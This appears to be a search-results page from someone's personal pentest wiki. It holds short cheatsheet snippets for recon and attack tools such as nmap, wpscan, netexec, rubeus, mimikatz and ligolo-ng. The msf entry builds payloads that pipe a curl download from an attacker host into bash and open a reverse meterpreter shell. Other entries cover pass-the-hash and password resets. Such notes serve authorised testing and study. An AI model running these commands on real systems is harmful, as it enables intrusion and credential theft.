Skip to main content
Advanced Search
Search Terms
Content Type

Exact Matches
Tag Searches
Date Options
Updated after
Updated before
Created after
Created before

Search Results

28 total results found

Basic Commands

Linux Linux for Beginners

cd Usage To change directories Examples cd temp # browses to the directory called temp cd /usr/bin # browses to /usr/bin folder cd - # browse to previous directory cd .. # browse to the parent direcotry cd ../../ #browse 2 parent directories ...

Key Differences between ISO 27001:2022 and 27001:2013

General

Annex A Control Type ISO/IEC 27001:2022 Annex A Identifier ISO/IEC 27001:2013 Annex A Identifier Annex A Name Organisational Controls Annex A 5.1 Annex A 5.1.1 Annex A 5.1.2 Policies for Information Security Organisational Controls ...

Komodo

Linux

https://komo.do - For in-depth information utilise the following Introduction Komodo is a lightweight but powerful build and deployment system that cuts through the usual headaches of managing Docker-based projects. At its core, it automates what so many t...

Fresh builds

Hacking

pimp-my-kali I use this to install all tools like impacket and so on .zshrc modifications I’ve created several aliases that I utilise throughout my hacking #custom alias alias grep='grep --color=auto' alias fgrep='fgrep --color=auto' alias egrep='egrep ...

autorecon

Hacking Tools

Basic usage autorecon TARGET_IP Scanning multiple hosts autorecon -t targets.txt #or the below sudo $(which autorecon) TARGET_IP1 TARGET_IP2 TARGET_IP3 -vv

Primary Function
Recon
Secondary Function

nmap

Hacking Tools

Base Syntax nmap {Targets} [ScanType] [Options] Target Purpose Example 1 target nmap IP scan multiple targets nmap IP1, IP2, IP3 scan a list nmap -iL list.txt scan CIDR range nmap 192.168.1.0/24 Ports Purpose...

Primary Function
Recon

wpscan

Hacking Tools

Basic usage wpscan --url http://TARGET_IP Scan for plugins wpscan --url http://TARGET_IP -e p Scan for users wpscan --url http://TARGET_IP -e u Scan for vulnerable plugins wpscan --url http://TARGET_IP -e vp Brute force passwords wpscan --url http://T...

Primary Function
Enumeration

fuff

Hacking Tools

Basic Usage ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://TARGET_IP:PORT/FUZZ

Primary Function
Enumeration

nikto

Hacking Tools

Basic usage nikto -host http://TARGET_IP -p PORT

Primary Function
Enumeration

gobuster

Hacking Tools

Basic usage gobuster dir -u http://TARGET_IP:PORT -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt Enumerating with extensions (filter the extension based on target) gobuster dir -u http://TARGET_IP:PORT -w /usr/share/wordlists/dirbuster/direc...

Primary Function
Enumeration

netexec

Hacking Tools

Enumeration SMB netexec smb targets.txt -u user_name -H 'NTLM_HASH' netexec smb TARGET_IP -u user_name -H 'NTLM_HASH' --groups --local-groups --loggedon-users --rid-brute --users --shares --pass-pol winrm netexec winrm targets.txt -u user_name -H '...

Primary Function
Enumeration
Secondary Function
Privilege Escalation
Secondary Function
Pivot

powerview

Hacking Tools

1. Enumerate common names Get-DomainComputer | select cn

Primary Function
Enumeration

msf

Hacking Tools

Linux payloads With commands msfvenom -p linux/x64/exec CMD='echo I love programming. && curl http://YOUR_IP/shell.php | bash' -f elf -o shellme.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -f csharp > payl...

Primary Function
Privilege Escalation

rubeus

Hacking Tools

Rubeus.exe asktgt /user:username /rc4:NTLM_hash /ptt

powersploit

Hacking Tools

Reset a user’s password $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force Set-DomainUserPassword -Identity nina -AccountPassword $UserPassword

Primary Function
Privilege Escalation

mimikatz

Hacking Tools

You will need to first upload the binaries to the target, either via a meterpreter shell or powershell: meterpreter upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe upload /usr/share/windows-resources/mimikatz/x64/mimidrv.sys powershell power...

Primary Function
Pivot
Secondary Function
Privilege Escalation
Secondary Function
Enumeration

ligolo-ng

Hacking Tools

You can use the standard apt repos if you don’t need to do any modifications, e.g. bypassing Applocker or CLM. sudo apt install ligolo-ng ligolo-ng-common-binaries -y Basic tunnel start ligolo-proxy sudo ligolo-proxy -selfcert Connect the agent ...

Primary Function
Pivot

Quick Checklist

Hacking Cheatsheets

Personal Checklist [ ] Enumeration [ ] nmap [ ] autorecon [ ] HTTP/S? [ ] gobuster/dirbuster [ ] nikto [ ] wpscan [ ] User - Privesc [ ] id [ ] lxd [ ] sudo -l [ ] gtfobins [ ] linpeas.sh [ ] SUID/GUID - gtfobins ...